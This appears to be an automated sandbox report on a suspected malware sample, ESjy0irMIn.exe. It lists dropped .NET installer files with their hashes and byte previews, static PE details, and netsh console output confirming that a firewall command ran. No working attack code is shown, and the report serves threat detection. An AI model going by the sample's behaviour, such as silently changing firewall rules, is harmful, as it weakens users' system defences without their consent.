                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.................j.}.....].v.....h.w.....\.H...v.e.|.......B.....h.~.....Y.|.....].~.....m.~.....l.~.....k.~...Rich............PE..L......K.........."......f...........+............@..........................P............@...... ..................pu..x...Tp..<.......................H....@...... ................................(..@............................................text....e.......f.................. ..`.data................j..............@....rsrc................v..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\SetupEngine.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):807256
                                                                                                                                                                  Entropy (8bit):6.357664904941565
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:GS62nlYAqK/AitUgiuVQk/oifPNJIkjbSTzR8NmsBJj:GS62nlYAltBjPNJIkHST18QsBJ
                                                                                                                                                                  MD5:84C1DAF5F30FF99895ECAB3A55354BCF
                                                                                                                                                                  SHA1:7E25BA36BCC7DEED89F3C9568016DDB3156C9C5A
                                                                                                                                                                  SHA-256:7A0D281FA802D615EA1207BD2E9EBB98F3B74F9833BBA3CB964BA7C7E0FB67FD
                                                                                                                                                                  SHA-512:E4FB7E4D39F094463FDCDC4895AB2EA500EB51A32B6909CEC80A526BBF34D5C0EB98F47EE256C0F0865BF3169374937F047BF5C4D6762779C8CA3332B4103BE3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................&......&.......R.....z.....O.....{......B...........O.....~.....J.....K.....L....Rich...........................PE..L......K.........."!................Y...............................................;.....@.....................................h....................:..X...............................................@............................................text............................... ..`.data...8...........................@....rsrc................f..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\SetupUi.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):295248
                                                                                                                                                                  Entropy (8bit):6.262127887617593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:/LTVUK59JN+C0iy4Ww8oBcPFIOrvHvr8QDZHAAKWiIHT6llN1QkvQZaiionv5y/y:HOoMFrz8ygAKWiiIyKf73w
                                                                                                                                                                  MD5:EB881E3DDDC84B20BD92ABCEC444455F
                                                                                                                                                                  SHA1:E2C32B1C86D4F70E39DE65E9EBC4F361B24FF4A1
                                                                                                                                                                  SHA-256:11565D97287C01D22AD2E46C78D8A822FA3E6524561D4C02DFC87E8D346C44E7
                                                                                                                                                                  SHA-512:5750CEC73B36A3F19BFB055F880F3B6498A7AE589017333F6272D26F1C72C6F475A3308826268A098372BBB096B43FBD1E06E93EECC0A81046668228BC179A75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..bI...I..WI...I..cI..I..ZI...I...IG..I..WI...I..fI...I..RI...I..SI...I..TI...IRich...I................PE..L......K.........."!................................................................yq....@..........................................P...............j..P....`..0?..................................`z..@............................................text............................... ..`.data....Q.......4..................@....rsrc........P......................@..@.reloc...T...`...V..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\SetupUi.xsd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30120
                                                                                                                                                                  Entropy (8bit):4.990211039591874
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
                                                                                                                                                                  MD5:2FADD9E618EFF8175F2A6E8B95C0CACC
                                                                                                                                                                  SHA1:9AB1710A217D15B192188B19467932D947B0A4F8
                                                                                                                                                                  SHA-256:222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
                                                                                                                                                                  SHA-512:A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\SetupUtility.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):96088
                                                                                                                                                                  Entropy (8bit):6.292361456158864
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:L+59IKI1N74oszIepIJqwlAno0dwRXPuY6zcVcE7OgkT9vs6M4raUZrH9rHUA:L+59hI1NktIemJllRXGYRKEaVM4raUZh
                                                                                                                                                                  MD5:8DFBB95989AF28058C7431704CE7CD66
                                                                                                                                                                  SHA1:78A5927D6B65D177F537FC671ED6BE4A77F20353
                                                                                                                                                                  SHA-256:589B4F04ED38A35D29C4A16FCCB489C3FBA6505F5DA399C1A2AF0CA966486059
                                                                                                                                                                  SHA-512:51FFB1B20006BB1C2F396C84EF19D7D47AD421D0A3196919B4ABC26405326BF15DDB989EDF815CBEDEEA8DEDC0454C0CC22A3987492E9BC1646A42A31151E1AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ux`.1...1...1...8a..0...^o......^o..!...^o..@...8a..:...1...T...Vo..0...Vo..;...Vo..0...Vo..0...Vo..0...Vo..0...Rich1...........................PE..L......K.........."......0...L.......^.......@....@..................................u....@...... ..................`>.......5..x....p...............`..X............................................K..@...............|............................text............0.................. ..`.data........@.......4..............@....rsrc........p.......D..............@..@.reloc..f............H..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\SplashScreen.bmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 200 x 200 x 8, image size 40002, resolution 3779 x 3779 px/m, cbSize 41080, bits offset 1078
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41080
                                                                                                                                                                  Entropy (8bit):6.9955557349183595
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:G1o2kgxmJGEsU3pP28+Qq1ms68/tUqHUlHGwM7bwv3ETbFrS:kkpoapTbimsqHGI
                                                                                                                                                                  MD5:0966FCD5A4AB0DDF71F46C01EFF3CDD5
                                                                                                                                                                  SHA1:8F4554F079EDAD23BCD1096E6501A61CF1F8EC34
                                                                                                                                                                  SHA-256:31C13ECFC0EB27F34036FB65CC0E735CD444EEC75376EEA2642F926AC162DCB3
                                                                                                                                                                  SHA-512:A9E70A2FB5A9899ACF086474D71D0E180E2234C40E68BCADB9BF4FE145774680CB55584B39FE53CC75DE445C6BF5741FC9B15B18385CBBE20FC595FE0FF86FCE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:BMx.......6...(...................B.......................{7...>...h?..D...N...K..........xE..._#..q..T...X...Q...[..._...c...j....>.!....f...v...r...."..v....0....... ..........4..I.........[...}..............j.............................................................................................................i......................@>1.......................................................o...u...u...z...z...~............................................................................................................................................................................{...~.................................................................................................................yw`......................................................................................................................................................//'...........................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Strings.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14084
                                                                                                                                                                  Entropy (8bit):3.701412990655975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:VqZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VqB
                                                                                                                                                                  MD5:8A28B474F4849BEE7354BA4C74087CEA
                                                                                                                                                                  SHA1:C17514DFC33DD14F57FF8660EB7B75AF9B2B37B0
                                                                                                                                                                  SHA-256:2A7A44FB25476886617A1EC294A20A37552FD0824907F5284FADE3E496ED609B
                                                                                                                                                                  SHA-512:A7927700D8050623BC5C761B215A97534C2C260FCAB68469B7A61C85E2DFF22ED9CF57E7CB5A6C8886422ABE7AC89B5C71E569741DB74DAA2DCB4152F14C2369
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". ..... . . . . . . . . .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.S.t.r.i.n.g.s.>..... . . . .<.!.-.-. .R.e.f.l.e.c.t.i.v.e. .p.r.o.p.e.r.t.y. .p.a.g.e. .-.-.>..... . . . .<.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>.#.(.l.o.c...i.d.s._.i.s._.r.e.a.l.l.y._.c.a.n.c.e.l.).<./.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>......... . . . .<.!.-.-. .S.y.s.t.e.m. .R.e.q.u.i.r.e.m.e.n.t.s. .p.a.g.e. .-.-.>..... . . . .<.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.P.A.C.E.>.#.(.l.o.c...s.y.s.r.e.q.p.a.g.e._.r.e.q.u.i.r.e.d._.a.n.d._.a.v.a.i.l.a.b.l.e._.d.i.s.k._.s.p.a.c.e.).<./.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\UiInfo.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39042
                                                                                                                                                                  Entropy (8bit):3.1132391675648923
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtK:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOv
                                                                                                                                                                  MD5:D7A2E90DD9DF6F93FD4B7354F8EC2B0D
                                                                                                                                                                  SHA1:A792C41B62796513E312F19DEE91447B9280B23B
                                                                                                                                                                  SHA-256:1D1590EB48E66646ED7917A76302862AC87E6651C841A808CF3FE797B9E697F6
                                                                                                                                                                  SHA-512:A3431DA5517428B69D4481A98AB6CDA6849F3B1B33DD44CC2EDFD76DDBF51BD2B45B3C4ED21293F7FEE2789281B8CF5120EF83F11F99DE6FC18C0E3FE5D1D9D5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\header.bmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 49 x 49 x 8, image size 2550, resolution 2834 x 2834 px/m, cbSize 3628, bits offset 1078
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3628
                                                                                                                                                                  Entropy (8bit):4.8382652865388724
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:f0sO8Kdwc6o5NF5ghwwpnMOccFpscGqfkemvIQpQK/xHiggTfGRgVC0q:cMa1krnrJmdQ+EgyfG3
                                                                                                                                                                  MD5:514BFCD8DA66722A9639EB41ED3988B7
                                                                                                                                                                  SHA1:CF11618E3A3C790CD5239EE749A5AE513B4205CD
                                                                                                                                                                  SHA-256:6B8201ED10CE18FFADE072B77C6D1FCACCF1D29ACB47D86F553D9BEEBD991290
                                                                                                                                                                  SHA-512:89F01C3361BA874015325007EA24E83AE6E73700996D0912695A4E7CB3F8A611494BA9D63F004DCD4F358821E756BE114BCF0137ED9B130776A6E26A95382C7B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:BM,.......6...(...1...1................................iI.|4..{3...8...:...qI..oH..hH......8...9...<...A...>..}<...@...F...C..t:...A...D...qG..C...E..m:...L...K...H...G...L...N..yB...L..........N...S...Z...S..vC...J...U......V...S...R...Y...V...Y...Y...M...Z...h...x8..|<...i......]...\...Y...]...V...^...^...e...c...o...l...c...a..._..._...b...X...j...^...d...k...j...q...u...p...x+..p.....h...g...d...j...b...u...u...n...t...t...s...m...r...u...s...{"...4...i..r...m...m...w...u...q...t...}...K...N..U..l..........r.......x...{....!...#...)..@..N..V...............$...#...'...,..4..5..:..C..T..u......................... ...'...*..,.....<..B..V..\..e..p..............)..,..2..4..5..9..<..<..R..\..d...y........................................................ ..)..3..8..:..B..L..O..n......................................................4..^....................O...b...|.........................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\sqmapi.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):144416
                                                                                                                                                                  Entropy (8bit):6.7404750879679485
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
                                                                                                                                                                  MD5:3F0363B40376047EFF6A9B97D633B750
                                                                                                                                                                  SHA1:4EAF6650ECA5CE931EE771181B04263C536A948B
                                                                                                                                                                  SHA-256:BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
                                                                                                                                                                  SHA-512:537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................................Rich...................PE..L....IE...........!.........$.....................l.........................@......R.....@.........................D.......$...d....................... (... ......P...8............................\..@.......t.......D............................text............................... ..`.data...............................@....rsrc...............................@..@.reloc....... ......................@..Ba.IE8....IEC....IEP....IEZ.....IEe....IEP...........msvcrt.dll.ADVAPI32.dll.ntdll.DLL.USER32.dll.KERNEL32.dll...............................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\watermark.bmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 164 x 628 x 8, image size 102994, resolution 3779 x 3779 px/m, cbSize 104072, bits offset 1078
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):104072
                                                                                                                                                                  Entropy (8bit):7.2628723112196
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:QKUpOeBmAj72KbvEvffvCv7cTIMUHuRzHA8X9H51T9ho4xw7CgB1:QKULmAfbvEv47cIHzE9vo4SuU1
                                                                                                                                                                  MD5:B0075CEE80173D764C0237E840BA5879
                                                                                                                                                                  SHA1:B4CF45CD5BB036F4F210DFCBA6AC16665A7C56A8
                                                                                                                                                                  SHA-256:AB18374B3AAB10E5979E080D0410579F9771DB888BA1B80A5D81BA8896E2D33A
                                                                                                                                                                  SHA-512:71A748C82CC8B0B42EF5A823BAC4819D290DA2EDDBB042646682BCCC7EB7AB320AFDCFDFE08B1D9EEBE149792B1259982E619F8E33845E33EEC808C546E5C829
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:BM........6...(.......t...........R...................};.......F.......T...c....H..b...t...m...z...d...a..._...f...f....&..x...j...w...o...k...r....+..........|...u...|...q...v...w...|...2..~...z.......x...........{.................................................................... ...#..:..P..e................................#..#..&..(..+..+..-........EDA................$..,../..4..2..6..;...........................$..'..,..0..:..?..E......................6..5..>...D...I...K...Q...j...................=...D...L...P...U...V...\...r.....................Y...\...`...d...b...f...j...l...{..................................`...g...o...u...|....................................................................................................................................................................................................................................................................................

                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):313
                                                                                                                                                                  Entropy (8bit):4.971939296804078
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                                                                                                                  MD5:689E2126A85BF55121488295EE068FA1
                                                                                                                                                                  SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                                                                                                                  SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                                                                                                                  SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.74314221794367
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.65%
                                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                  • InstallShield setup (43055/19) 0.21%
                                                                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                  File name:ESjy0irMIn.exe
                                                                                                                                                                  File size:1'078'272 bytes
                                                                                                                                                                  MD5:536018d01ee05bc37064c480178e2bf8
                                                                                                                                                                  SHA1:1d21d2d4f21fa7a19cad7e69c8c143bebc9ba7fd
                                                                                                                                                                  SHA256:a9ea7800b0f50505268b058f14a23dbe4cf6c0f134681a68dce7429b9df8d88b
                                                                                                                                                                  SHA512:666ca68783a862ad3ce3e031854aa3344398ae52eda5dd5a97fed0baa964f3cdf8f26289b6adc1db9843f79c142ce36547417f8b13adf86d35f03394cfd1ec14
                                                                                                                                                                  SSDEEP:24576:vtW4x8xgmUdUcyezFSjahBaNOMGC3UgJuTYdIMlM9QVmcIOLfEdjJYVB1X1:s4x8x1UGexmbcMGC3U3MlLVmczEdjJYR
                                                                                                                                                                  TLSH:B735DF1F11A0A033EFD236716998B2603F6DDD5AA7308D8F32C432FD4AF1AE26975255
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P._.................h............... ........@.. ....................................@................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x5087de
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x5FC55092 [Mon Nov 30 20:05:38 2020 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                  Data Directories

                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1087840x57.text
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x6ae.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
